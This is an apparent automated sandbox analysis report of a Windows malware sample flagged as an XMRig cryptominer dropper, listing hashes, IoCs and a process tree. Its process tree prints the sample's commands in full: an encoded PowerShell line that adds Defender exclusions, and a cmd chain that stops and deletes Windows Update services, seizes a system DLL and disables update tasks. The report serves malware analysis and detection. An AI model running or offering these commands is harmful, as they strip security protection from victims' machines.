Analysis
-
max time kernel
151s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220722-en -
resource tags
arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system -
submitted
11-08-2022 23:03
Static task
static1
Behavioral task
behavioral1
Sample
c7ad8aff4b9bcaaf8362bc46dbb335bd.exe
Resource
win7-20220715-en
General
-
Target
c7ad8aff4b9bcaaf8362bc46dbb335bd.exe
-
Size
5.0MB
-
MD5
c7ad8aff4b9bcaaf8362bc46dbb335bd
-
SHA1
6da9bd46beba784cde7bce3d73963567c9efb9b0
-
SHA256
1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84
-
SHA512
e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/444-215-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/444-216-0x000000014036EAC4-mapping.dmp xmrig behavioral2/memory/444-217-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/444-218-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/444-231-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/444-234-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
gsd5432.exepid process 1284 gsd5432.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 3116 takeown.exe 4280 icacls.exe 616 takeown.exe 624 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
c7ad8aff4b9bcaaf8362bc46dbb335bd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation c7ad8aff4b9bcaaf8362bc46dbb335bd.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 624 icacls.exe 3116 takeown.exe 4280 icacls.exe 616 takeown.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.EXEpowershell.exegsd5432.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\gsd5432.exe.log gsd5432.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
gsd5432.exedescription pid process target process PID 1284 set thread context of 444 1284 gsd5432.exe svchost.exe -
Drops file in Program Files directory 3 IoCs
Processes:
powershell.exegsd5432.exedescription ioc process File created C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe powershell.exe File opened for modification C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe powershell.exe File created C:\Program Files\Google\Libs\WR64.sys gsd5432.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1824 sc.exe 2488 sc.exe 4736 sc.exe 4764 sc.exe 1852 sc.exe 784 sc.exe 1540 sc.exe 3420 sc.exe 3692 sc.exe 3356 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEgsd5432.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" gsd5432.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ gsd5432.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" gsd5432.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" gsd5432.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" gsd5432.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 3356 reg.exe 4268 reg.exe 4472 reg.exe 2396 reg.exe 908 reg.exe 392 reg.exe 4980 reg.exe 3412 reg.exe 1972 reg.exe 4620 reg.exe 2272 reg.exe 3832 reg.exe 3580 reg.exe 2056 reg.exe 2308 reg.exe 1972 reg.exe 2036 reg.exe 3472 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exec7ad8aff4b9bcaaf8362bc46dbb335bd.exepowershell.exepowershell.EXEpowershell.exegsd5432.exesvchost.exepid process 2236 powershell.exe 2236 powershell.exe 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe 2200 powershell.exe 2200 powershell.exe 1296 powershell.EXE 1296 powershell.EXE 4252 powershell.exe 4252 powershell.exe 1284 gsd5432.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe 444 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 644 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exec7ad8aff4b9bcaaf8362bc46dbb335bd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 2236 powershell.exe Token: SeDebugPrivilege 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe Token: SeShutdownPrivilege 4160 powercfg.exe Token: SeCreatePagefilePrivilege 4160 powercfg.exe Token: SeShutdownPrivilege 4484 powercfg.exe Token: SeCreatePagefilePrivilege 4484 powercfg.exe Token: SeShutdownPrivilege 1948 powercfg.exe Token: SeCreatePagefilePrivilege 1948 powercfg.exe Token: SeShutdownPrivilege 3668 powercfg.exe Token: SeCreatePagefilePrivilege 3668 powercfg.exe Token: SeTakeOwnershipPrivilege 3116 takeown.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeIncreaseQuotaPrivilege 2200 powershell.exe Token: SeSecurityPrivilege 2200 powershell.exe Token: SeTakeOwnershipPrivilege 2200 powershell.exe Token: SeLoadDriverPrivilege 2200 powershell.exe Token: SeSystemProfilePrivilege 2200 powershell.exe Token: SeSystemtimePrivilege 2200 powershell.exe Token: SeProfSingleProcessPrivilege 2200 powershell.exe Token: SeIncBasePriorityPrivilege 2200 powershell.exe Token: SeCreatePagefilePrivilege 2200 powershell.exe Token: SeBackupPrivilege 2200 powershell.exe Token: SeRestorePrivilege 2200 powershell.exe Token: SeShutdownPrivilege 2200 powershell.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeSystemEnvironmentPrivilege 2200 powershell.exe Token: SeRemoteShutdownPrivilege 2200 powershell.exe Token: SeUndockPrivilege 2200 powershell.exe Token: SeManageVolumePrivilege 2200 powershell.exe Token: 33 2200 powershell.exe Token: 34 2200 powershell.exe Token: 35 2200 powershell.exe Token: 36 2200 powershell.exe Token: SeIncreaseQuotaPrivilege 2200 powershell.exe Token: SeSecurityPrivilege 2200 powershell.exe Token: SeTakeOwnershipPrivilege 2200 powershell.exe Token: SeLoadDriverPrivilege 2200 powershell.exe Token: SeSystemProfilePrivilege 2200 powershell.exe Token: SeSystemtimePrivilege 2200 powershell.exe Token: SeProfSingleProcessPrivilege 2200 powershell.exe Token: SeIncBasePriorityPrivilege 2200 powershell.exe Token: SeCreatePagefilePrivilege 2200 powershell.exe Token: SeBackupPrivilege 2200 powershell.exe Token: SeRestorePrivilege 2200 powershell.exe Token: SeShutdownPrivilege 2200 powershell.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeSystemEnvironmentPrivilege 2200 powershell.exe Token: SeRemoteShutdownPrivilege 2200 powershell.exe Token: SeUndockPrivilege 2200 powershell.exe Token: SeManageVolumePrivilege 2200 powershell.exe Token: 33 2200 powershell.exe Token: 34 2200 powershell.exe Token: 35 2200 powershell.exe Token: 36 2200 powershell.exe Token: SeIncreaseQuotaPrivilege 2200 powershell.exe Token: SeSecurityPrivilege 2200 powershell.exe Token: SeTakeOwnershipPrivilege 2200 powershell.exe Token: SeLoadDriverPrivilege 2200 powershell.exe Token: SeSystemProfilePrivilege 2200 powershell.exe Token: SeSystemtimePrivilege 2200 powershell.exe Token: SeProfSingleProcessPrivilege 2200 powershell.exe Token: SeIncBasePriorityPrivilege 2200 powershell.exe Token: SeCreatePagefilePrivilege 2200 powershell.exe Token: SeBackupPrivilege 2200 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c7ad8aff4b9bcaaf8362bc46dbb335bd.execmd.execmd.execmd.exedescription pid process target process PID 4864 wrote to memory of 2236 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe powershell.exe PID 4864 wrote to memory of 2236 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe powershell.exe PID 4864 wrote to memory of 4112 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe cmd.exe PID 4864 wrote to memory of 4112 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe cmd.exe PID 4864 wrote to memory of 1548 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe cmd.exe PID 4864 wrote to memory of 1548 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe cmd.exe PID 4112 wrote to memory of 3692 4112 cmd.exe sc.exe PID 4112 wrote to memory of 3692 4112 cmd.exe sc.exe PID 4112 wrote to memory of 4764 4112 cmd.exe sc.exe PID 4112 wrote to memory of 4764 4112 cmd.exe sc.exe PID 1548 wrote to memory of 4160 1548 cmd.exe powercfg.exe PID 1548 wrote to memory of 4160 1548 cmd.exe powercfg.exe PID 1548 wrote to memory of 4484 1548 cmd.exe powercfg.exe PID 1548 wrote to memory of 4484 1548 cmd.exe powercfg.exe PID 4112 wrote to memory of 3356 4112 cmd.exe sc.exe PID 4112 wrote to memory of 3356 4112 cmd.exe sc.exe PID 4112 wrote to memory of 1852 4112 cmd.exe sc.exe PID 4112 wrote to memory of 1852 4112 cmd.exe sc.exe PID 1548 wrote to memory of 1948 1548 cmd.exe powercfg.exe PID 1548 wrote to memory of 1948 1548 cmd.exe powercfg.exe PID 4112 wrote to memory of 784 4112 cmd.exe sc.exe PID 4112 wrote to memory of 784 4112 cmd.exe sc.exe PID 1548 wrote to memory of 3668 1548 cmd.exe powercfg.exe PID 1548 wrote to memory of 3668 1548 cmd.exe powercfg.exe PID 4112 wrote to memory of 4472 4112 cmd.exe reg.exe PID 4112 wrote to memory of 4472 4112 cmd.exe reg.exe PID 4112 wrote to memory of 2056 4112 cmd.exe reg.exe PID 4112 wrote to memory of 2056 4112 cmd.exe reg.exe PID 4112 wrote to memory of 2308 4112 cmd.exe reg.exe PID 4112 wrote to memory of 2308 4112 cmd.exe reg.exe PID 4112 wrote to memory of 1972 4112 cmd.exe reg.exe PID 4112 wrote to memory of 1972 4112 cmd.exe reg.exe PID 4112 wrote to memory of 2396 4112 cmd.exe reg.exe PID 4112 wrote to memory of 2396 4112 cmd.exe reg.exe PID 4864 wrote to memory of 2200 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe powershell.exe PID 4864 wrote to memory of 2200 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe powershell.exe PID 4112 wrote to memory of 3116 4112 cmd.exe takeown.exe PID 4112 wrote to memory of 3116 4112 cmd.exe takeown.exe PID 4112 wrote to memory of 4280 4112 cmd.exe icacls.exe PID 4112 wrote to memory of 4280 4112 cmd.exe icacls.exe PID 4864 wrote to memory of 4956 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe cmd.exe PID 4864 wrote to memory of 4956 4864 c7ad8aff4b9bcaaf8362bc46dbb335bd.exe cmd.exe PID 4956 wrote to memory of 4752 4956 cmd.exe choice.exe PID 4956 wrote to memory of 4752 4956 cmd.exe choice.exe PID 4112 wrote to memory of 908 4112 cmd.exe reg.exe PID 4112 wrote to memory of 908 4112 cmd.exe reg.exe PID 4112 wrote to memory of 392 4112 cmd.exe reg.exe PID 4112 wrote to memory of 392 4112 cmd.exe reg.exe PID 4112 wrote to memory of 3832 4112 cmd.exe reg.exe PID 4112 wrote to memory of 3832 4112 cmd.exe reg.exe PID 4112 wrote to memory of 2036 4112 cmd.exe reg.exe PID 4112 wrote to memory of 2036 4112 cmd.exe reg.exe PID 4112 wrote to memory of 2420 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 2420 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 2124 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 2124 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 4976 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 4976 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 4092 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 4092 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 2432 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 2432 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 3772 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 3772 4112 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c7ad8aff4b9bcaaf8362bc46dbb335bd.exe"C:\Users\Admin\AppData\Local\Temp\c7ad8aff4b9bcaaf8362bc46dbb335bd.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBiAGEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBoAGoAbwAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3692 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4764 -
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3356 -
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1852 -
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:784 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
PID:4472 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
PID:2056 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
PID:2308 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
PID:1972 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
PID:2396 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3116 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4280 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
PID:908 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
PID:392 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:3832 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:2036 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵PID:2420
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵PID:2124
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵PID:4976
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵PID:4092
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵PID:2432
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵PID:3772
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:1828
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4160 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4484 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
